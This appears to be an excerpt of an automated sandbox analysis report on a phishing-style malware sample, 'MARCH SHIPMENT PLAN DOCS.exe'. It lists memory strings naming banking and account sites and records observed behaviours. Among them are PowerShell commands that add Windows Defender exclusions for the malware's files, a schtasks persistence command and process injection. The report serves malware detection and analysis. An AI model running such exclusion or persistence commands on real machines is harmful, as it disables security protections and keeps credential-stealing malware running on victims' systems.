Source: PKjWaa.exe, 0000000C.00000002.1319303263.0000000000EA1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: PKjWaa.exe, 0000000C.00000002.1319303263.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: PKjWaa.exe, 00000014.00000002.3704246417.000000000105F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMode
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3703868306.0000000001446000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: PKjWaa.exe, 0000000C.00000002.1319303263.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5cd0d6d8d833<
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5c610e80a695<
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

Code function: 10_2_06F29448 LdrInitializeThunk,

10_2_06F29448

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe"
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory written: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory written: C:\Users\user\AppData\Roaming\PKjWaa.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe"	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process created: C:\Users\user\AppData\Roaming\PKjWaa.exe "C:\Users\user\AppData\Roaming\PKjWaa.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
